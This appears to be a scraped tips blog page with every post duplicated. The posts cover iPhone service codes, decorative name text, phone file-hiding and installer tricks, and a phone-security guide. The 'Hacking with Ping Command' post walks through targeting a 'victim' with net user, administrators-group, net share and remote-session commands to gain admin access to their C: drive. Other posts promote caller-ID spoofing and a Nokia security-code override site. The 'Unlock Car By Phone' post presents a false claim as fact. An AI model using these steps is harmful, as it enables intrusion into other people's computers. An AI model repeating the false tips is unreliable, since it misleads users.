Showing posts with label Mix Tricks. Show all posts
Showing posts with label Mix Tricks. Show all posts

Tuesday, 4 March 2014

Hack Codes For iphone 4 or 4s



Hello friends, today i am going to share all the available secret hack codes for iPhone 4 or iPhone 4S. These secret hack codes will help you to hack the iPhone and helps you to explore the internal settings of your iPhone.

Secret codes are actually those codes which are not known(hidden) to general users, usually Geeks use these codes as their shortcuts to browse the internal settings and perform their exploits. As we all know iPhone is quite secured and there are very less hack codes available for the same but don't worry Guys i come up with all the available hacking codes that works on iPhone 4 or 4S. You can also try these hack codes on previous models as i have tested them only of iPhone 4 and iPhone 4S. Some of them works on iPhone 4 and some on iPhone 4S and some are specific to operator. So please don't complain if any of them didn't work for you.. All codes are tested personally and are 100% working..

Note: Some of codes will require tapping of call key on your iPhone, actually most of them require call button + tap(means slide it). So if any code doesn't work just by dialing, you just need to tap the call key and it will work. Infact except the IMEI number one hack code all require call + tap.

Secret Hack Codes for iPhone 4 or iPhone 4S
*#43#
Use to verify if call waiting is enabled

*#61#
Verify the number for unanswered calls

*#62#
Verify the number for call forwarding if no service is available.

*#67#
Verify the number for call forwarding if phone is busy

*#33#
To verify whether barring is enabled or disabled for outgoing

*#21#
To display the settings for your call forwarding

*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.

*#06#
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.

*225#
Displays the account balance for postpaid contracts.

*777#
Displays the account balance for prepaid accounts.

*646#
Displays the remaining minutes available.

*3282#
Get your data usage information.

*729
Options to make payments. Its operator specific.

611
Dials customer service, (114 in RSA for Vodacom). Its operator specific.

*#30#
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.

*#76#
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.
Note: This is the list of all iPhone codes available till now in market. If hope i haven't even missed the one. If still you are able to find any extra hack code for iPhone 4 or iPhone 4S then don't hesitate in sharing, as Sharing is Caring.


Hello friends, today i am going to share all the available secret hack codes for iPhone 4 or iPhone 4S. These secret hack codes will help you to hack the iPhone and helps you to explore the internal settings of your iPhone.

Secret codes are actually those codes which are not known(hidden) to general users, usually Geeks use these codes as their shortcuts to browse the internal settings and perform their exploits. As we all know iPhone is quite secured and there are very less hack codes available for the same but don't worry Guys i come up with all the available hacking codes that works on iPhone 4 or 4S. You can also try these hack codes on previous models as i have tested them only of iPhone 4 and iPhone 4S. Some of them works on iPhone 4 and some on iPhone 4S and some are specific to operator. So please don't complain if any of them didn't work for you.. All codes are tested personally and are 100% working..

Note: Some of codes will require tapping of call key on your iPhone, actually most of them require call button + tap(means slide it). So if any code doesn't work just by dialing, you just need to tap the call key and it will work. Infact except the IMEI number one hack code all require call + tap.

Secret Hack Codes for iPhone 4 or iPhone 4S
*#43#
Use to verify if call waiting is enabled

*#61#
Verify the number for unanswered calls

*#62#
Verify the number for call forwarding if no service is available.

*#67#
Verify the number for call forwarding if phone is busy

*#33#
To verify whether barring is enabled or disabled for outgoing

*#21#
To display the settings for your call forwarding

*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.

*#06#
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.

*225#
Displays the account balance for postpaid contracts.

*777#
Displays the account balance for prepaid accounts.

*646#
Displays the remaining minutes available.

*3282#
Get your data usage information.

*729
Options to make payments. Its operator specific.

611
Dials customer service, (114 in RSA for Vodacom). Its operator specific.

*#30#
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.

*#76#
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.
Note: This is the list of all iPhone codes available till now in market. If hope i haven't even missed the one. If still you are able to find any extra hack code for iPhone 4 or iPhone 4S then don't hesitate in sharing, as Sharing is Caring.

Saturday, 1 September 2012

Make name in style


friends you can make your name in stylish.
e.g.
name:fida hussain

its styles

•?((¯°·._.• ƒɨďą hµ$$ąɨɲ •._.·°¯))؟•

•?((¯°·._.• ƒȋďå ȟɥ§§åȋñ •._.·°¯))؟•

•?((¯°·._.• ƒɨȡą ɦµȿȿąɨɲ •._.·°¯))؟•

•?((¯°·._.• ғίȡά ħùşşάίή •._.·°¯))؟•

•?((¯°·._.• ƑĮĎÃ ĤǗŜŜÃĮŇ •._.·°¯))؟•

•?((¯°·._.• ғι∂α нυssαιη •._.·°¯))؟•

•?((¯°·._.• Ŧเ๔ค ђยรรคเภ •._.·°¯))؟

•ıllıllı ₣ÏĐÄ ȞŮŚŚÄÏŅ ıllıllı
¸,ø¤º°`°º¤ø,¸¸,ø¤º° ₣ÏĐÄ ȞŮŚŚÄÏŅ °º¤ø,¸¸,ø¤º°`°º¤ø,¸

°°°·.°·..·°¯°·._.· ₣ÏĐÄ ȞŮŚŚÄÏŅ ·._.·°¯°·.·° .·°°°

•´¯`•. ₣ÏĐÄ ȞŮŚŚÄÏŅ .•´¯`•

׺°”˜`”°º× ₣ÏĐÄ ȞŮŚŚÄÏŅ ×º°”˜`”°º×

•]••´º´•» ₣ÏĐÄ ȞŮŚŚÄÏŅ «•´º´••[•

]|I{•------» ₣ÏĐÄ ȞŮŚŚÄÏŅ «------•}I|[

§.•´¨'°÷•..× ₣ÏĐÄ ȞŮŚŚÄÏŅ ×,.•´¨'°÷•..§

•°¯`•• ₣ÏĐÄ ȞŮŚŚÄÏŅ ••´¯°•

(¯`·.¸¸.·´¯`·.¸¸.-> ₣ÏĐÄ ȞŮŚŚÄÏŅ <-.¸¸.·´¯`·.¸¸.·´¯)

(¯`·._(¯`·._(¯`·._( ₣ÏĐÄ ȞŮŚŚÄÏŅ )_.·´¯)_.·´¯)_.·´¯)

*´¯`*.¸¸.*´¯`* ₣ÏĐÄ ȞŮŚŚÄÏŅ *´¯`*.¸¸.*´¯`*

(¯`·.¸¸.-> °º ₣ÏĐÄ ȞŮŚŚÄÏŅ º° <-.¸¸.·´¯)

°·.¸.·°¯°·.¸.·°¯°·.¸.-> ₣ÏĐÄ ȞŮŚŚÄÏŅ <-.¸.·°¯°·.¸.·°¯°·.¸.·°

|!¤*'~``~'*¤!| ₣ÏĐÄ ȞŮŚŚÄÏŅ |!¤*'~``~'*¤!|

•·.·´¯`·.·• ₣ÏĐÄ ȞŮŚŚÄÏŅ •·.·´¯`·.·•

`·.¸¸.·´´¯`··._.· ₣ÏĐÄ ȞŮŚŚÄÏŅ ·._.··`¯´´·.¸¸.·`

׺°”˜`”°º× ₣ÏĐÄ ȞŮŚŚÄÏŅ ×º°”`˜”°º×

._|.<(+_+)>.|_. ₣ÏĐÄ ȞŮŚŚÄÏŅ ._|.<(+_+)>.|_.

•°o.O ₣ÏĐÄ ȞŮŚŚÄÏŅ O.o°•

+*¨^¨*+ ₣ÏĐÄ ȞŮŚŚÄÏŅ +*¨^¨*+

×÷•.•´¯`•» ₣ÏĐÄ ȞŮŚŚÄÏŅ «•´¯`•.•÷×

••.•´¯`•.•• ₣ÏĐÄ ȞŮŚŚÄÏŅ ••.•´¯`•.••

•._.••´¯``•.¸¸.•` ₣ÏĐÄ ȞŮŚŚÄÏŅ `•.¸¸.•´´¯`••._.•

¸„.-•~¹°”ˆ˜¨ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¨˜ˆ”°¹~•-.„¸

(¯´•._.• ₣ÏĐÄ ȞŮŚŚÄÏŅ •._.•´¯)

••¤(`×[¤ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¤]×´)¤••

•´¯`•» ₣ÏĐÄ ȞŮŚŚÄÏŅ «•´¯`•

`•.,¸¸,.•´¯ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¯`•.,¸¸,.•´

¸,ø¤º°`°º¤ø,¸ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¸,ø¤º°`°º¤ø,¸

.o0×X×0o. ₣ÏĐÄ ȞŮŚŚÄÏŅ .o0×X×0o.

,-*'^'~*-.,_,.-*~ ₣ÏĐÄ ȞŮŚŚÄÏŅ ~*-.,_,.-*~'^'*-,

`•.¸¸.•´´¯`••._.• ₣ÏĐÄ ȞŮŚŚÄÏŅ •._.••`¯´´•.¸¸.•`

—(••÷[ ₣ÏĐÄ ȞŮŚŚÄÏŅ ]÷••—

¤¸¸.•´¯`•¸¸.•..>> ₣ÏĐÄ ȞŮŚŚÄÏŅ <<..•.¸¸•´¯`•.¸¸¤

••.•´¯`•.•• ₣ÏĐÄ ȞŮŚŚÄÏŅ ••.•´¯`•.••

.•°¤*(¯`★´¯)*¤° ₣ÏĐÄ ȞŮŚŚÄÏŅ °¤*(¯´★`¯)*¤°•.

๑۞๑,¸¸,ø¤º°`°๑۩ ₣ÏĐÄ ȞŮŚŚÄÏŅ ๑۩ ,¸¸,ø¤º°`°๑۞๑

-漫~*'¨¯¨'*·舞~ ₣ÏĐÄ ȞŮŚŚÄÏŅ ~舞*'¨¯¨'*·~漫-

★·.·´¯`·.·★ ₣ÏĐÄ ȞŮŚŚÄÏŅ ★·.·´¯`·.·★

▁ ▂ ▄ ▅ ▆ ▇ █ ₣ÏĐÄ ȞŮŚŚÄÏŅ █ ▇ ▆ ▅ ▄ ▂ ▁

▀▄▀▄▀▄ ₣ÏĐÄ ȞŮŚŚÄÏŅ ▄▀▄▀▄▀

(-_-) ₣ÏĐÄ ȞŮŚŚÄÏŅ (-_-)

▌│█║▌║▌║ ₣ÏĐÄ ȞŮŚŚÄÏŅ ║▌║▌║█│▌

friends you can make your name in stylish.
e.g.
name:fida hussain

its styles

•?((¯°·._.• ƒɨďą hµ$$ąɨɲ •._.·°¯))؟•

•?((¯°·._.• ƒȋďå ȟɥ§§åȋñ •._.·°¯))؟•

•?((¯°·._.• ƒɨȡą ɦµȿȿąɨɲ •._.·°¯))؟•

•?((¯°·._.• ғίȡά ħùşşάίή •._.·°¯))؟•

•?((¯°·._.• ƑĮĎÃ ĤǗŜŜÃĮŇ •._.·°¯))؟•

•?((¯°·._.• ғι∂α нυssαιη •._.·°¯))؟•

•?((¯°·._.• Ŧเ๔ค ђยรรคเภ •._.·°¯))؟

•ıllıllı ₣ÏĐÄ ȞŮŚŚÄÏŅ ıllıllı
¸,ø¤º°`°º¤ø,¸¸,ø¤º° ₣ÏĐÄ ȞŮŚŚÄÏŅ °º¤ø,¸¸,ø¤º°`°º¤ø,¸

°°°·.°·..·°¯°·._.· ₣ÏĐÄ ȞŮŚŚÄÏŅ ·._.·°¯°·.·° .·°°°

•´¯`•. ₣ÏĐÄ ȞŮŚŚÄÏŅ .•´¯`•

׺°”˜`”°º× ₣ÏĐÄ ȞŮŚŚÄÏŅ ×º°”˜`”°º×

•]••´º´•» ₣ÏĐÄ ȞŮŚŚÄÏŅ «•´º´••[•

]|I{•------» ₣ÏĐÄ ȞŮŚŚÄÏŅ «------•}I|[

§.•´¨'°÷•..× ₣ÏĐÄ ȞŮŚŚÄÏŅ ×,.•´¨'°÷•..§

•°¯`•• ₣ÏĐÄ ȞŮŚŚÄÏŅ ••´¯°•

(¯`·.¸¸.·´¯`·.¸¸.-> ₣ÏĐÄ ȞŮŚŚÄÏŅ <-.¸¸.·´¯`·.¸¸.·´¯)

(¯`·._(¯`·._(¯`·._( ₣ÏĐÄ ȞŮŚŚÄÏŅ )_.·´¯)_.·´¯)_.·´¯)

*´¯`*.¸¸.*´¯`* ₣ÏĐÄ ȞŮŚŚÄÏŅ *´¯`*.¸¸.*´¯`*

(¯`·.¸¸.-> °º ₣ÏĐÄ ȞŮŚŚÄÏŅ º° <-.¸¸.·´¯)

°·.¸.·°¯°·.¸.·°¯°·.¸.-> ₣ÏĐÄ ȞŮŚŚÄÏŅ <-.¸.·°¯°·.¸.·°¯°·.¸.·°

|!¤*'~``~'*¤!| ₣ÏĐÄ ȞŮŚŚÄÏŅ |!¤*'~``~'*¤!|

•·.·´¯`·.·• ₣ÏĐÄ ȞŮŚŚÄÏŅ •·.·´¯`·.·•

`·.¸¸.·´´¯`··._.· ₣ÏĐÄ ȞŮŚŚÄÏŅ ·._.··`¯´´·.¸¸.·`

׺°”˜`”°º× ₣ÏĐÄ ȞŮŚŚÄÏŅ ×º°”`˜”°º×

._|.<(+_+)>.|_. ₣ÏĐÄ ȞŮŚŚÄÏŅ ._|.<(+_+)>.|_.

•°o.O ₣ÏĐÄ ȞŮŚŚÄÏŅ O.o°•

+*¨^¨*+ ₣ÏĐÄ ȞŮŚŚÄÏŅ +*¨^¨*+

×÷•.•´¯`•» ₣ÏĐÄ ȞŮŚŚÄÏŅ «•´¯`•.•÷×

••.•´¯`•.•• ₣ÏĐÄ ȞŮŚŚÄÏŅ ••.•´¯`•.••

•._.••´¯``•.¸¸.•` ₣ÏĐÄ ȞŮŚŚÄÏŅ `•.¸¸.•´´¯`••._.•

¸„.-•~¹°”ˆ˜¨ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¨˜ˆ”°¹~•-.„¸

(¯´•._.• ₣ÏĐÄ ȞŮŚŚÄÏŅ •._.•´¯)

••¤(`×[¤ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¤]×´)¤••

•´¯`•» ₣ÏĐÄ ȞŮŚŚÄÏŅ «•´¯`•

`•.,¸¸,.•´¯ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¯`•.,¸¸,.•´

¸,ø¤º°`°º¤ø,¸ ₣ÏĐÄ ȞŮŚŚÄÏŅ ¸,ø¤º°`°º¤ø,¸

.o0×X×0o. ₣ÏĐÄ ȞŮŚŚÄÏŅ .o0×X×0o.

,-*'^'~*-.,_,.-*~ ₣ÏĐÄ ȞŮŚŚÄÏŅ ~*-.,_,.-*~'^'*-,

`•.¸¸.•´´¯`••._.• ₣ÏĐÄ ȞŮŚŚÄÏŅ •._.••`¯´´•.¸¸.•`

—(••÷[ ₣ÏĐÄ ȞŮŚŚÄÏŅ ]÷••—

¤¸¸.•´¯`•¸¸.•..>> ₣ÏĐÄ ȞŮŚŚÄÏŅ <<..•.¸¸•´¯`•.¸¸¤

••.•´¯`•.•• ₣ÏĐÄ ȞŮŚŚÄÏŅ ••.•´¯`•.••

.•°¤*(¯`★´¯)*¤° ₣ÏĐÄ ȞŮŚŚÄÏŅ °¤*(¯´★`¯)*¤°•.

๑۞๑,¸¸,ø¤º°`°๑۩ ₣ÏĐÄ ȞŮŚŚÄÏŅ ๑۩ ,¸¸,ø¤º°`°๑۞๑

-漫~*'¨¯¨'*·舞~ ₣ÏĐÄ ȞŮŚŚÄÏŅ ~舞*'¨¯¨'*·~漫-

★·.·´¯`·.·★ ₣ÏĐÄ ȞŮŚŚÄÏŅ ★·.·´¯`·.·★

▁ ▂ ▄ ▅ ▆ ▇ █ ₣ÏĐÄ ȞŮŚŚÄÏŅ █ ▇ ▆ ▅ ▄ ▂ ▁

▀▄▀▄▀▄ ₣ÏĐÄ ȞŮŚŚÄÏŅ ▄▀▄▀▄▀

(-_-) ₣ÏĐÄ ȞŮŚŚÄÏŅ (-_-)

▌│█║▌║▌║ ₣ÏĐÄ ȞŮŚŚÄÏŅ ║▌║▌║█│▌

Friday, 3 August 2012

software protection and .exe locker


click on download


click on download

4 desktop in one pc


click on download

download now


click on download

download now

Wednesday, 1 August 2012

Hide your secert files in cell phone without any software


dosto is post ko prhney k bad ap is kabil ho jaen ge k apni khufiya files apny mob me bgair kisi softwere istmal krty hue hide kr sken
bus ye kam kren

Go to the area where u want to
hide files (gallery/ applications)
Create a folder-
FolderName.jad
Add the files needed to be hidded
to this folder
Create an another folder, where
the FolderName.jad is located.
Name it as-
FolderName.jar
Now the 1st folder will not be
visible.. But after renaming
FolderName.jar to some other like-
FolderName.jara
the 1st folder will be visible and u
may access it..
U may name the both folders as u
like.. For eg: 'a.jar' and 'a.jad'
__________________

dosto is post ko prhney k bad ap is kabil ho jaen ge k apni khufiya files apny mob me bgair kisi softwere istmal krty hue hide kr sken
bus ye kam kren

Go to the area where u want to
hide files (gallery/ applications)
Create a folder-
FolderName.jad
Add the files needed to be hidded
to this folder
Create an another folder, where
the FolderName.jad is located.
Name it as-
FolderName.jar
Now the 1st folder will not be
visible.. But after renaming
FolderName.jar to some other like-
FolderName.jara
the 1st folder will be visible and u
may access it..
U may name the both folders as u
like.. For eg: 'a.jar' and 'a.jad'
__________________

Tuesday, 31 July 2012

Auto SIS Installer for Java Mobiles


 How to use:


1, you need to duplicate all the programs you want to set up on E:ThinkChangec or E:ThinkChangee
2, get into the AutoSisInstaller program, media “StartInstall”, it will instantly set up all the information in that folder

3, After the procedure is finish, there would be a conclusion informing you which information never set up.
Why using AutoSisInstaller ?
1, Have many preferred programs to set up after a firmware update?
2, Want to try many applications after purchased a new phone?
3, Get tired to media many important factors to set up an applicaton
Another awesome usage:
Share with your companion your preferred applications! Install AutoSisInstaller to the storage, and just connect your storage into his system, all your preferred programs in the E:ThinkChange file will be instantly set up to his device!



 How to use:


1, you need to duplicate all the programs you want to set up on E:ThinkChangec or E:ThinkChangee
2, get into the AutoSisInstaller program, media “StartInstall”, it will instantly set up all the information in that folder

3, After the procedure is finish, there would be a conclusion informing you which information never set up.
Why using AutoSisInstaller ?
1, Have many preferred programs to set up after a firmware update?
2, Want to try many applications after purchased a new phone?
3, Get tired to media many important factors to set up an applicaton
Another awesome usage:
Share with your companion your preferred applications! Install AutoSisInstaller to the storage, and just connect your storage into his system, all your preferred programs in the E:ThinkChange file will be instantly set up to his device!


Monday, 30 July 2012

Hacking with Ping Command

Hacking with Ping Command!----->1)
 Ping command a cool way to say hello to victim try ping [victims ip goes here] if the result is request timed out then the user is ofline if the result is reply from [ip] bytes=32 time<1ms TTL 64 the victim is online. 
2)net user [anyname] /add it adds a new net user put any name inplace of [anyname] 
3)net localgroup administrators [anyname] /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share.
 4)net share system=C:\ /unlimited This commands share the C: drive with the name of system. you can use any root dir. instead 
5)net use \\victimip [nameofnetaccount] This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. where nameofnetuser is the name via which victim logs on 
6)explorer \\victimip\system And this will open a explorer windows in the share system wich is the C: drive with administrators access! 
Hacking with Ping Command!----->1)
 Ping command a cool way to say hello to victim try ping [victims ip goes here] if the result is request timed out then the user is ofline if the result is reply from [ip] bytes=32 time<1ms TTL 64 the victim is online. 
2)net user [anyname] /add it adds a new net user put any name inplace of [anyname] 
3)net localgroup administrators [anyname] /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share.
 4)net share system=C:\ /unlimited This commands share the C: drive with the name of system. you can use any root dir. instead 
5)net use \\victimip [nameofnetaccount] This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. where nameofnetuser is the name via which victim logs on 
6)explorer \\victimip\system And this will open a explorer windows in the share system wich is the C: drive with administrators access! 

Thursday, 24 May 2012

Protect Mobile Agins hack:

Protect Mobile Agins Thack:
PROTECT YOUR CELLPHONE AGAINST HACKING Protecting Your Cell Phone Secure your mobile devices using the following steps. Phone/SIM Locks Most modern cell phones offer multiple levels of code locks simi?lar to the password in PCs. While it may be inconvenient, you should seriously consider code-locking your phone, especially if you are on the move for an extended period of time. The first, of course, is the SIM card PIN Code. You will normal?ly be given a PIN code when you purchase your SIM card. Actually you will be given four sets of codes when you purchase the phone: PIN1, PIN2, PUK1, and PUK2. PIN1 activates your phone when you first switch it on. PIN2 is used when you need to access some advanced func?tions. PUK1 is used if you forget or enter the wrong PIN1 code. If you enter the wrong PIN1 code three times, the SIM card locks and you will need to enter the PUK1 code to unlock it and reset your PIN1 code. If you lose your PUK number, there is no other recourse than to get a new SIM card from your cell phone serv?ice provider. PUK2 is similar to PUK1, and is used for PIN2. Along with the above, you should also consider locking your phone with a phone-specific security code. This will effectively stop anyone from accessing the phone if they do not know the code. Even if they switch off the phone, remove the SIM and replace it with another, they will still be unable to access the phone without the security code. One other measure is to use a keyguard code for locking your phone. Most cell phones support automatic locking of the keypad after a period of inactivity. This prevents dialling if the keys get inadvertently depressed when in your pocket. You will have to press a combination of keys (Nokia: Menu *) to unlock the phone or to manually lock it. You can set your phone to require a code when you unlock your keypad. Also make it a habit to manually lock your phone immediately after a call. Sometimes, the keyguard will fail to kick in as some key has already been accidentally depressed before the keyguard acti?vation time-out. In a scenario where a thief steals your phone and tries to make a call, the keyguard code will block access on an already-powered on phone. On restarting, the PIN request for the SIM will thwart him. If the SIM is changed, the phone's security code will also block access. The phone will become practically useless to the thief. You can rest assured that all your personal data will be protected, even though you may not be to recover it! Also, the thief could attempt to reset the security code by calling the cell phone vendor's customer service and pretending to be the owner. To prevent that, inform them of the theft as well as your mobile phone's IMEI number.IMEI is short for International Mobile Equipment Identity. Every mobile device in the world has a unique number. The IMEI number will be usually found under the battery slab, Many phones will also display the IMEI number if you key in *#06#. Of course, you will need to take this precaution beforehand and store the IMEI number in a safe place?not on your cell phone, and not in your wallet! If you have a Nokia phone, forgotten your security code, and have the IMEI number, you can go to http://nfader. z-host.ru/ and generate a master security code using your phone IMEI number. You can use the master security code to override your personal security code and gain access to your mobile. You can then reset the security code as required Bluetooth Hacking Bluetooth is great. You can snap pictures, take video clips with your camera phone, transfer it to your laptop, or beam it across to a friend's mobile. However, if you do not secure Bluetooth access on your phone, it is easily "discoverable" by other Bluetooth devices in the immediate vicinity. A person with a Bluetooth?enabled device can send you unsolicited messages, transfer virus?es and worms to your phone, or even gain access and steal your personal data and / or corrupt it. An experienced Bluetooth hack er can gain access to your mobile phone commands, using it to make phone calls, send expensive international SMS messages, write entries into your phonebook, eavesdrop on your conversa?tions, and even gain access to the Internet. Bluetooth criminals are known to roam neighbourhoods with powerful Bluetooth detectors that search for Bluetooth enabled cell phones, PDAs, and laptops. They are known to fit laptops with powerful antennas that can pick up Bluetooth devices from with?in a range of 800 metres! The latest tactic is to force Bluetooth devices in hidden mode to pair with the attacker's device. This, however, is very labour-intensive, and is most often used against known targets who have large bank accounts or expensive secrets. How it works Almost all cases of Bluetooth attacks are a result of improper setup of the Bluetooth device. In most cases, Bluetooth devices are con?figured at security level 1, where there is no encryption or authen?tication. This enables the attacker to request information from the device that will be helpful in stealing it.Once stolen, not only is the data on the device compromised, it will also compromise the data on all devices trusted by it. This can then be used to eavesdrop on conversations between other devices.Additionally, Bluetooth uses the Service Discovery Protocol (SDP) to determine what services are offered by what devices in range. Attackers can use this information to launch service-specif?ic attacks on any of the devices.If the attacker is able to obtain the link keys and the address?ing of two communicating devices, he can launch a man-in-the?middle type of attack where all information is routed through the attacker's device.Attackers can also eavesdrop on devices that are pairing up for the first time. This will give the attacker sufficient information to use an algorithm to guess the security key and pretend to be the other device. Avoiding It Securing your Bluetooth phone is easy. Take these few simple steps to ensure that your device is protected from Bluetooth attacks. Switch off Bluetooth when you are not using it. This will pre?vent unauthorised access for the most part. Only enable Bluetooth when you are actively transferring data from or to another device. Use a strong PIN code, one that is at least six to eight digits or longer. Many devices offer tons of features to maximise the usability of your Bluetooth connections. Review the documentation and dis?able all that are a security risk, and pay special attention to the security settings. Use encryption by default and only disable it if the device you are communicating with doesn't support it. Ensure that Bluetooth is running in hidden mode. When you are pairing it with another device, like a headset, you will need to run it in discoverable mode. Do this in a secure location like inside your office or home. Once the link has been established, go back to hidden mode. If for some reason the pairing breaks when in a public place, wait till you are in a secure location before re-pairing the two devices. Be aware of where you are. If you are in an open, public place, it is best to disable Bluetooth. Public wireless hotspots are a favourite hangout of "Bluejackers 

Protect Mobile Agins Thack:
PROTECT YOUR CELLPHONE AGAINST HACKING Protecting Your Cell Phone Secure your mobile devices using the following steps. Phone/SIM Locks Most modern cell phones offer multiple levels of code locks simi?lar to the password in PCs. While it may be inconvenient, you should seriously consider code-locking your phone, especially if you are on the move for an extended period of time. The first, of course, is the SIM card PIN Code. You will normal?ly be given a PIN code when you purchase your SIM card. Actually you will be given four sets of codes when you purchase the phone: PIN1, PIN2, PUK1, and PUK2. PIN1 activates your phone when you first switch it on. PIN2 is used when you need to access some advanced func?tions. PUK1 is used if you forget or enter the wrong PIN1 code. If you enter the wrong PIN1 code three times, the SIM card locks and you will need to enter the PUK1 code to unlock it and reset your PIN1 code. If you lose your PUK number, there is no other recourse than to get a new SIM card from your cell phone serv?ice provider. PUK2 is similar to PUK1, and is used for PIN2. Along with the above, you should also consider locking your phone with a phone-specific security code. This will effectively stop anyone from accessing the phone if they do not know the code. Even if they switch off the phone, remove the SIM and replace it with another, they will still be unable to access the phone without the security code. One other measure is to use a keyguard code for locking your phone. Most cell phones support automatic locking of the keypad after a period of inactivity. This prevents dialling if the keys get inadvertently depressed when in your pocket. You will have to press a combination of keys (Nokia: Menu *) to unlock the phone or to manually lock it. You can set your phone to require a code when you unlock your keypad. Also make it a habit to manually lock your phone immediately after a call. Sometimes, the keyguard will fail to kick in as some key has already been accidentally depressed before the keyguard acti?vation time-out. In a scenario where a thief steals your phone and tries to make a call, the keyguard code will block access on an already-powered on phone. On restarting, the PIN request for the SIM will thwart him. If the SIM is changed, the phone's security code will also block access. The phone will become practically useless to the thief. You can rest assured that all your personal data will be protected, even though you may not be to recover it! Also, the thief could attempt to reset the security code by calling the cell phone vendor's customer service and pretending to be the owner. To prevent that, inform them of the theft as well as your mobile phone's IMEI number.IMEI is short for International Mobile Equipment Identity. Every mobile device in the world has a unique number. The IMEI number will be usually found under the battery slab, Many phones will also display the IMEI number if you key in *#06#. Of course, you will need to take this precaution beforehand and store the IMEI number in a safe place?not on your cell phone, and not in your wallet! If you have a Nokia phone, forgotten your security code, and have the IMEI number, you can go to http://nfader. z-host.ru/ and generate a master security code using your phone IMEI number. You can use the master security code to override your personal security code and gain access to your mobile. You can then reset the security code as required Bluetooth Hacking Bluetooth is great. You can snap pictures, take video clips with your camera phone, transfer it to your laptop, or beam it across to a friend's mobile. However, if you do not secure Bluetooth access on your phone, it is easily "discoverable" by other Bluetooth devices in the immediate vicinity. A person with a Bluetooth?enabled device can send you unsolicited messages, transfer virus?es and worms to your phone, or even gain access and steal your personal data and / or corrupt it. An experienced Bluetooth hack er can gain access to your mobile phone commands, using it to make phone calls, send expensive international SMS messages, write entries into your phonebook, eavesdrop on your conversa?tions, and even gain access to the Internet. Bluetooth criminals are known to roam neighbourhoods with powerful Bluetooth detectors that search for Bluetooth enabled cell phones, PDAs, and laptops. They are known to fit laptops with powerful antennas that can pick up Bluetooth devices from with?in a range of 800 metres! The latest tactic is to force Bluetooth devices in hidden mode to pair with the attacker's device. This, however, is very labour-intensive, and is most often used against known targets who have large bank accounts or expensive secrets. How it works Almost all cases of Bluetooth attacks are a result of improper setup of the Bluetooth device. In most cases, Bluetooth devices are con?figured at security level 1, where there is no encryption or authen?tication. This enables the attacker to request information from the device that will be helpful in stealing it.Once stolen, not only is the data on the device compromised, it will also compromise the data on all devices trusted by it. This can then be used to eavesdrop on conversations between other devices.Additionally, Bluetooth uses the Service Discovery Protocol (SDP) to determine what services are offered by what devices in range. Attackers can use this information to launch service-specif?ic attacks on any of the devices.If the attacker is able to obtain the link keys and the address?ing of two communicating devices, he can launch a man-in-the?middle type of attack where all information is routed through the attacker's device.Attackers can also eavesdrop on devices that are pairing up for the first time. This will give the attacker sufficient information to use an algorithm to guess the security key and pretend to be the other device. Avoiding It Securing your Bluetooth phone is easy. Take these few simple steps to ensure that your device is protected from Bluetooth attacks. Switch off Bluetooth when you are not using it. This will pre?vent unauthorised access for the most part. Only enable Bluetooth when you are actively transferring data from or to another device. Use a strong PIN code, one that is at least six to eight digits or longer. Many devices offer tons of features to maximise the usability of your Bluetooth connections. Review the documentation and dis?able all that are a security risk, and pay special attention to the security settings. Use encryption by default and only disable it if the device you are communicating with doesn't support it. Ensure that Bluetooth is running in hidden mode. When you are pairing it with another device, like a headset, you will need to run it in discoverable mode. Do this in a secure location like inside your office or home. Once the link has been established, go back to hidden mode. If for some reason the pairing breaks when in a public place, wait till you are in a secure location before re-pairing the two devices. Be aware of where you are. If you are in an open, public place, it is best to disable Bluetooth. Public wireless hotspots are a favourite hangout of "Bluejackers 

CHECK TV SCHEDULE OF INDIA

Mobile Blog




  • *



  • *

Unlock Car By Phone


Unlock Car By Phone

» If you lock your keys in the car and the spare keys are at home then, call someone at home on their cell phone from your cell phone. Now hold your cell phone about a foot from your car door and let the other person at your home press the unlock button on your spare keys, holding it near the phone on their end. Finally your car will be unlocked. Distance is does not matter here. You could be hundreds of miles away, and if you can reach someone who has the other "remote" for your car, you can unlock the doors.

* Your car should have audio tones, or is susceptible to RF interference.
»

Unlock Car By Phone

» If you lock your keys in the car and the spare keys are at home then, call someone at home on their cell phone from your cell phone. Now hold your cell phone about a foot from your car door and let the other person at your home press the unlock button on your spare keys, holding it near the phone on their end. Finally your car will be unlocked. Distance is does not matter here. You could be hundreds of miles away, and if you can reach someone who has the other "remote" for your car, you can unlock the doors.

* Your car should have audio tones, or is susceptible to RF interference.
»

Call Anyone - Anywhere


Call Anyone - Anywhere




Call From Any Number To Any Number! Check ur self how much risky it is...
http://video.google.com/videoplay?docid=8578820474716816206 MINO CALL www.minowireless.com if you create an account,and download the software into ur cell(if ur cellphone is GPRS activated)..it will ask u to call frm and call to...just give a small try wid ur frndz... you can call from website too without downloading software... 

Call Anyone - Anywhere




Call From Any Number To Any Number! Check ur self how much risky it is...
http://video.google.com/videoplay?docid=8578820474716816206 MINO CALL www.minowireless.com if you create an account,and download the software into ur cell(if ur cellphone is GPRS activated)..it will ask u to call frm and call to...just give a small try wid ur frndz... you can call from website too without downloading software... 

Google Search In Mobile


Google Search In Mobile



Use GOOGLE-SEARCH without GPRS.
sms to 9773 300 000.

Search any thing here as like GOOGLE SEARCH By GOOGLE. 

Google Search In Mobile



Use GOOGLE-SEARCH without GPRS.
